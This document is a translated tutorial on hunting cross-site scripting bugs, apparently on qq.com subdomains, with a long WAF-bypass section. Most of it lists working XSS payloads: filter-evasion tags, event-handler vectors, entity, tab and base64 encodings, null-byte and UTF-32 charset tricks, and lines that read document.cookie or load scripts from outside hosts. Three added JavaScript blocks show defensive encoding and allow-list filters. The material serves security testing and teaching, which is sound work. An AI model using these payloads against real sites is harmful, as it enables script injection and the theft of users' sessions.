Experience and techniques for finding XSS, summarized as follows:
1. Enumerate every subdomain under qq.com
To find subdomains I usually use third-party services such as fofa.so and 5118.com, which turn up plenty. Out of boredom I have also written a subdomain brute-forcing tool, but brute-forcing character by character instead of from a word list produces a huge search space and is not very practical. An XSS on any qq.com subdomain can be combined with CSRF within the domain, so the subdomains as a group pose a considerably greater threat.
2. Do not miss a single input or output
We can actually use scripts to help with this. Pick a subdomain, open it, press F12 and watch every HTTP request. Whether it is GET or POST, as long as the string you enter appears in the output, test it! Callback parameters, content parameters, no parameter is spared!
3. Check every output location
Sometimes you will find that an input parameter is reflected into an attribute of an HTML tag, such as value="input"; then consider closing the double quote. Sometimes it even lands inside a <script> tag: close the string, close the tag, and construct your own code!
4. Don't give up in a hurry
The output is inside <script> as var xx='input', but the single quote is escaped with a backslash? Don't close the page just yet; take a closer look, perhaps a simple %df' will let you close the string after all.
5. Don't trust that a fixed bug is really fixed
The vulnerability was submitted, so it is fixed? Wrong: perhaps the security engineer's repair is not perfect either! For example, one of my XSS bugs on tpai.qq.com had its output inside <script>; after the bug was submitted the engineer fixed it, but filtered only the three characters ( ) ;. Without ( ) ; it is really hard to build complete JavaScript, but have you thought about throw, or about document.write directly?
Bypassing WAF XSS filtering
0x00 Background
This article is taken from the XSS-filter bypass section of "Modern Web Application Firewalls Fingerprinting and Bypassing XSS Filters". The earlier part of that paper, which identifies the WAF in use from its fingerprint, is skipped here; the focus is the basic test flow for XSS. Although the aim is getting past a WAF, the tests rely on defects that are common to WAF rules rather than on any particular product, so the basics generalize to other XSS-filtering scenarios, and they let beginners pick up basic XSS testing methods quickly.
0x01 Bypassing blacklists
Most sites filter with a blacklist, and there are three ways to test for a bypass:
1. Brute-force testing (submit a large number of payloads and inspect the results)
2. Deduction from the regular expression (infer the rule from what is and is not filtered)
3. Exploiting browser bugs
Preliminary tests
1. Try inserting ordinary HTML tags such as <b>, <i>, <u> and look at the returned page: are they HTML-encoded, or are the tags filtered out?
2. Try inserting unclosed tags, for example <b, <i, <u, <marquee, and check in the response whether open tags are filtered.
3. Then test several XSS payloads that basically every XSS filter blocks:
<script>alert(1);</script>
<script>prompt(1);</script>
<script>confirm(1);</script>
<script src="http://rhainfosec.com/evil.js">
Look at the response: is everything filtered, or only part of it? Are the words alert, prompt, confirm left intact? Then try mixed case:
<ScRipt>alert(1);</sCRipt>
4. If the filter simply strips the <script> and </script> tags, you can use
<scr<script>ipt>alert(1)</scr<script>ipt>
to bypass it: once the <script> tags are removed, the remaining pieces join into a complete payload.
5. Test with the <a href tag and look at the response:
<a href="http://www.google.com">Clickme</a>
Is the <a tag filtered, is href filtered, and is the data inside href filtered?
If nothing is filtered, insert the javascript: protocol and check again:
<a href="javascript:alert(1)">Clickme</a>
Is the whole javascript: protocol content removed, or only the word javascript? If only the word, try changing its case.
Continue by testing event handlers that execute JavaScript:
<a href="rhainfosec.com" onmouseover=alert(1)>ClickHere</a>
See whether the onmouseover event is filtered. Then test an invalid event to learn the filtering rule:
<a href="rhainfosec.com" onclimbatree=alert(1)>ClickHere</a>
Is it returned intact, or killed just like onmouseover was?
If it is returned intact, the filter uses a blacklist of events. HTML5 has more than 150 events that can execute JavaScript, so test a very rare one:
<body/onhashchange=alert(1)><a href=#>clickit
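The following is an added example, not code from the original article: it shows on the nested payload from step 4 why a one-pass strip filter recombines into a live tag, and for step 5 why an allow-list of attribute names is the defender's answer to a blacklist of event names. The filter functions are constructed stand-ins, not any real WAF's rules.

```javascript
// Added example, not from the original article: why the strip-based blacklist
// from step 4 fails, and why the event blacklist from step 5 fails.

// The filter step 4 describes: one pass that deletes <script> and </script>.
function stripScriptTagsOnce(html) {
  return html.replace(/<\/?script>/gi, "");
}

// Repeating the filter until nothing changes closes the recombination gap,
// but it is still a blacklist and still knows nothing about other tags.
function stripScriptTagsToFixpoint(html) {
  let prev, cur = html;
  do { prev = cur; cur = stripScriptTagsOnce(cur); } while (cur !== prev);
  return cur;
}

// The defender's alternative: do not strip, encode. Once the five
// HTML-significant characters are entities, no tag can form however the
// input is nested, and the filter needs no list of dangerous names.
function encodeForHtmlText(s) {
  return s.replace(/[&<>"']/g, c =>
    ({ "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" })[c]);
}

// Step 5: a blacklist of event names lets onclimbatree or onhashchange
// through; an allow-list of attribute names rejects any unknown attribute.
// The regex is deliberately conservative (a quoted value containing spaces
// can trip it); a production filter should walk a real HTML parse tree.
function hasDisallowedAttribute(tagHtml, allowedAttrs) {
  const attrRe = /[\s\/]([a-zA-Z_:][-a-zA-Z0-9_:.]*)(?=\s*=|[\s\/>])/g;
  let m;
  while ((m = attrRe.exec(tagHtml)) !== null) {
    if (!allowedAttrs.has(m[1].toLowerCase())) return true;
  }
  return false;
}

const nested = "<scr<script>ipt>alert(1)</scr<script>ipt>";  // payload from step 4
console.log(stripScriptTagsOnce(nested));        // one pass recombines it into a live tag
console.log(stripScriptTagsToFixpoint(nested));  // "alert(1)", inert text
console.log(encodeForHtmlText(nested));          // entities only, never parsed as a tag
console.log(hasDisallowedAttribute('<a href="x" onclimbatree=alert(1)>', new Set(["href"])));
```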
Test other tags
Next, test other tags and attributes.
src attribute
<video src=x onerror=prompt(1);>
<audio src=x onerror=prompt(1);>
iframe tag
<iframe src="javascript:alert(2)">
<iframe/src="data:text/html;&Tab;base64&NewLine;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">
embed tag
<embed/src=//goo.gl/nlX0P>
action attribute
Use the action attribute of the <form and <isindex tags to execute JavaScript:
<form action="javascript:alert(1)"><input type=submit>
<isindex action="javascript:alert(1)" type=image>
<isindex action=j&Tab;a&Tab;vas&Tab;c&Tab;r&Tab;ipt:alert(1) type=image>
<isindex action=data:text/html, type=image>
<form action='data:text/html,<script>alert(1)</script>'><button>Click
formaction attribute
<isindex formaction="javascript:alert(1)" type=image>
<input type="image" formaction=javascript:alert(0)>
<form><button formaction=javascript:alert(1)>clickme
background attribute
<table background=javascript:alert(1)></table>  // works in Opera 10.5 and IE6
poster attribute
<video poster=javascript:alert(1)//></video>  // works in Opera 10.5 and below
data attribute
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=">
<object/data=//goo.gl/nlX0P?
code attribute
<applet code="javascript:confirm(document.cookie);">  // works in Firefox
<embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>
Event handlers
<svg/onload=prompt(1);>
<marquee/onstart=confirm(2)>/
<body onload=prompt(1);>
<select autofocus onfocus=alert(1)>
<textarea autofocus onfocus=alert(1)>
<keygen autofocus onfocus=alert(1)>
<video><source onerror="javascript:alert(1)">
The shortest test vectors
<q/oncut=open()>
<q/oncut=alert(1)>  // useful when the input length is limited
Nesting
<marquee<marquee/onstart=confirm(2)>/onstart=confirm(1)>
<BODY LANGUAGE=VBS ONLOAD=ALERT-1  // works in IE8
<command onmouseover="\x6a\x61\x76\x61\x53\x43\x52\x49\x50\x54\x26\x63\x6f\x6c\x6f\x6e\x3b\x63\x6f\x6e\x66\x69\x72\x6D\x26\x6C\x70\x61\x72\x3b\x31\x26\x72\x70\x61\x72\x3b">Save</command>  // works in IE8
When parentheses are filtered
When parentheses are filtered, you can use throw to bypass the filter:
<a onmouseover="javascript:window.onerror=alert;throw 1">
In Chrome and IE the vectors above raise an "uncaught" error; the following vector can be used instead:
<body/onload=javascript:window.onerror=eval;throw'=alert\x281\x29';>
expression attribute
<div style="color:rgb('&#0;x:expression(alert(1))"></div>  // IE7 and below
<style>#test{x:expression(alert(/xss/))}</style>  // IE7 and below
location attribute
<a onmouseover=location='javascript:alert(1)'>click
<body onfocus="location='javascript:alert(1)'">123
Some other payloads
<meta http-equiv="refresh" content="0;url=//goo.gl/nlX0P">
<meta http-equiv="refresh" content="0;javascript:alert(1)"/>
<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:\u0061lert(1);"></g></svg>
<svg xmlns:xlink="http://www.w3.org/1999/xlink"><a><circle r=100/><animate attributeName="xlink:href" values=";javascript:alert(1)" begin="0s" dur="0.1s" fill="freeze"/>
<svg><![CDATA[><image xlink:href="]]></svg>
<meta content="&NewLine;1&NewLine;;javascript:alert(1)" http-equiv="refresh"/>
<math><a xlink:href="//jsfiddle.net/t846h/">click
When = ( ) ; : are filtered
<svg><script>alert&#40/1/&#41</script>  // works in all browsers
In Opera the tag does not even need to be closed:
<svg><script>alert&#40 1&#41  // works in Opera
Entity encoding
In many cases the WAF entity-encodes the user's input. JavaScript is a very flexible language and accepts several encodings, such as hexadecimal, Unicode and HTML entities, but there are rules about where each encoding can be used:
Attributes:
href=
action=
formaction=
location=
on*=
name=
background=
poster=
src=
code=
Supported encodings: HTML entities, octal, decimal, hexadecimal and Unicode
Attribute:
data=
Supported encoding: Base64
Context-based filtering
The biggest problem for a WAF is that it does not know the context of the output location, so it can be bypassed according to the specific context.
Input inside an attribute
<input value="xsstest" type=text>
The controllable position is xsstest; you can close the attribute and the tag with
">
If < and > are filtered, you can instead use
"autofocus onfocus=alert(1)//
There are also a number of other payloads:
"onmouseover="prompt(0)x="
"onfocusin=alert(1)autofocus x="
"onfocusout=alert(1)autofocus x="
"onblur=alert(1)autofocus a="
Input inside a script tag
For example:
<script>
var x="input";
</script>
The controllable position is input. You could close the script tag and insert code, but simply closing the double quote is enough to execute JS:
";alert(1)//
The end result is
<script>
var x="";alert(1)//";
</script>
Unconventional event listeners
For example:
";document.body.addEventListener("DOMActivate",alert(1))//
";document.body.addEventListener("DOMActivate",prompt(1))//
";document.body.addEventListener("DOMActivate",confirm(1))//
Other events of the same class:
DOMAttrModified
DOMCharacterDataModified
DOMFocusIn
DOMFocusOut
DOMMouseScroll
DOMNodeInserted
DOMNodeInsertedIntoDocument
DOMNodeRemoved
DOMNodeRemovedFromDocument
DOMSubtreeModified
href content controllable
For example:
<a href="userinput">Click</a>
The controllable part is userinput; all we need to do is put JavaScript code into it:
javascript:alert(1)//
The final combination is:
<a href="javascript:alert(1)//">Click</a>
Transformations
Use HTML entity and URL encoding to bypass the blacklist; href decodes entities automatically. If all else fails, try VBScript in IE10 and below, or use the data: protocol.
JavaScript transformations
Examples that can be used with the javascript: protocol:
javascript&#00058;alert(1)
JavaScript:alert(1)
javaSCRIPT:alert(1)
javas&Tab;cript:\u0061lert(1);
javascript:\u0061lert&#x28;1&#x29
javascript&#x3A;alert(document.cookie)
VBScript transformations
vbscript:alert(1);
vbscript&#00058;alert(1);
vbscr&Tab;ipt:alert(1)"
Data URL
data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
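The following is an added example, not code from the original article: an allow-list check for href values that first applies the decoding a browser applies (entity decoding from the "Entity encoding" section, removal of tab and newline, case folding) so that every transformation listed above is judged by its real scheme. The entity table and the set of allowed schemes are constructed for the demo.

```javascript
// Added example, not from the original article: an allow-list href check that
// applies the normalisation a browser applies before it reads the scheme, so
// the entity, &Tab;/&NewLine; and case transformations above all collapse to
// the same "javascript:" or "vbscript:" scheme and are rejected together.

// Small named-entity table for the demo; a real filter needs the full HTML5
// named character reference list.
const NAMED_ENTITIES = { tab: "\t", newline: "\n", colon: ":", amp: "&", lt: "<", gt: ">", quot: '"' };

// Decode numeric and named character references. Leading zeros (&#00058;),
// hex (&#x3A;) and a missing trailing ";" are all tolerated, as in browsers.
function decodeHtmlEntities(s) {
  return s.replace(/&(#x[0-9a-f]+|#\d+|[a-z]+);?/gi, (whole, body) => {
    if (body[0] === "#") {
      const hex = body[1].toLowerCase() === "x";
      const cp = hex ? parseInt(body.slice(2), 16) : parseInt(body.slice(1), 10);
      return cp >= 0 && cp <= 0x10ffff ? String.fromCodePoint(cp) : whole;
    }
    const named = NAMED_ENTITIES[body.toLowerCase()];
    return named !== undefined ? named : whole;
  });
}

// Browsers drop ASCII tab, LF and CR anywhere in a URL and trim leading and
// trailing C0 controls and spaces before parsing the scheme.
function normaliseUrl(raw) {
  return decodeHtmlEntities(raw).replace(/[\t\n\r]/g, "").replace(/^[\x00-\x20]+|[\x00-\x20]+$/g, "");
}

const ALLOWED_SCHEMES = new Set(["http", "https", "mailto"]);  // constructed policy

// True only for relative URLs or URLs whose scheme is allow-listed. Whether
// protocol-relative "//host" links are acceptable is a policy choice, so it is
// a parameter rather than a guess.
function isSafeHref(raw, allowProtocolRelative = false) {
  const url = normaliseUrl(raw);
  if (url.startsWith("//")) return allowProtocolRelative;
  const m = /^([a-z][a-z0-9+.-]*):/i.exec(url);
  if (!m) return true;  // no scheme: relative to the page
  return ALLOWED_SCHEMES.has(m[1].toLowerCase());
}

// Transformations from this section, as constructed inputs.
["javascript&#00058;alert(1)", "javas&Tab;cript:\\u0061lert(1);", "javascript&#x3A;alert(document.cookie)",
 "vbscr&Tab;ipt:alert(1)", " JaVaScRipT:alert(1)", "https://www.google.com", "page.html?x=1"]
  .forEach(u => console.log(isSafeHref(u), JSON.stringify(u)));
```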
JSON
When your input is placed inside encodeURIComponent, it is easy to insert XSS code:
encodeURIComponent('userinput')
userinput is controllable; test with:
'-alert(1)-'
'-prompt(1)-'
'-confirm(1)-'
Final result:
encodeURIComponent(''-alert(1)-'')
encodeURIComponent(''-prompt(1)-'')
SVG tag
When the result is returned inside an SVG tag, for example
<svg><script>var myvar="yourinput";</script></svg>
yourinput is controllable; input
www.site.com/test.php?var=text";alert(1)//
Even if the double quote is entity-encoded, it is decoded again inside the SVG script, so the code still executes:
<svg><script>var myvar="text";alert(1)//";</script></svg>
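The following is an added example, not code from the original article: output encoding chosen per reflection context, covering the attribute, script-string, encodeURIComponent and SVG script cases above with this section's own payloads. The render functions are constructed templates standing in for the page's markup.

```javascript
// Added example, not from the original article: output encoding chosen per
// reflection context, shown with this section's own payloads. The three
// render functions are constructed templates standing in for the page's
// <input value="...">, <script>var x="...";</script> and SVG script cases.

// Attribute context: quotes, brackets, = and backtick become numeric
// entities, so neither "> nor "autofocus onfocus=... can leave the attribute.
function encodeForHtmlAttribute(s) {
  return s.replace(/[&<>"'`=]/g, c => "&#x" + c.charCodeAt(0).toString(16) + ";");
}

// JavaScript string context: JSON.stringify produces a double-quoted literal
// with " and \ escaped. <, > and & are escaped as \uXXXX as well, so the HTML
// parser never sees </script> inside the literal and, inside <svg><script>,
// where character references are decoded again, no &quot; can reappear.
// The template must not add its own quotes around the result.
function encodeForJsStringLiteral(s) {
  return JSON.stringify(s).replace(/[<>&\u2028\u2029]/g,
    c => "\\u" + c.charCodeAt(0).toString(16).padStart(4, "0"));
}

function renderInputTag(userValue) {
  return '<input value="' + encodeForHtmlAttribute(userValue) + '" type=text>';
}
function renderScriptVar(userValue) {
  return "<script>var x=" + encodeForJsStringLiteral(userValue) + ";</script>";
}
function renderSvgScriptVar(userValue) {
  return "<svg><script>var myvar=" + encodeForJsStringLiteral(userValue) + ";</script></svg>";
}

// Payloads from this section as constructed inputs; each stays inside its
// string or attribute in the output.
console.log(renderInputTag('"autofocus onfocus=alert(1)//'));
console.log(renderScriptVar('";alert(1)//'));
console.log(renderScriptVar('</script><svg onload=alert(1)>'));
console.log(renderSvgScriptVar('text&quot;;alert(1)//'));
```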
Browser bugs
Character-set bugs have appeared many times in IE. The first was UTF-7, but that only works in old versions; here we discuss one that executes JavaScript in a current browser:
http://xsst.sinaapp.com/utf-32-1.php?charset=utf-8&v=XSS
On this page we control the character set of the current page. With a routine test:
http://xsst.sinaapp.com/utf-32-1.php?charset=utf-8&v=">
the response shows that the double quotes are encoded:
<meta charset="utf-8"></meta>
<body>
<input type="text" value="&quot;><img src=x onerror=prompt(0);>"></input>
</body>
Set the character set to UTF-32:
http://xsst.sinaapp.com/utf-32-1.php?charset=utf-32&v=%E2%88%80%E3%B8%80%E3%B0%80script%E3%B8%80alert(1)%E3%B0%80/script%E3%B8%80
This executes successfully in IE9 and below.
Bypass using null bytes:
<scri%00pt>alert(1);</scri%00pt>
<scri\x00pt>alert(1);</scri%00pt>
<s%00c%00r%00%00ip%00t>confirm(0);</s%00c%00r%00%00ip%00t>
Works in IE9 and below.
For a series of other browser-feature XSS issues, refer to the following article:
http://drops.wooyun.org/tips/147
0x02 Summary
This article is mainly about the flow of thought when testing for XSS; it does not list every payload, and in fact nobody could. It is a general framework, and during actual hunting we can gradually add our own payloads following this approach; presumably there will be great progress! ~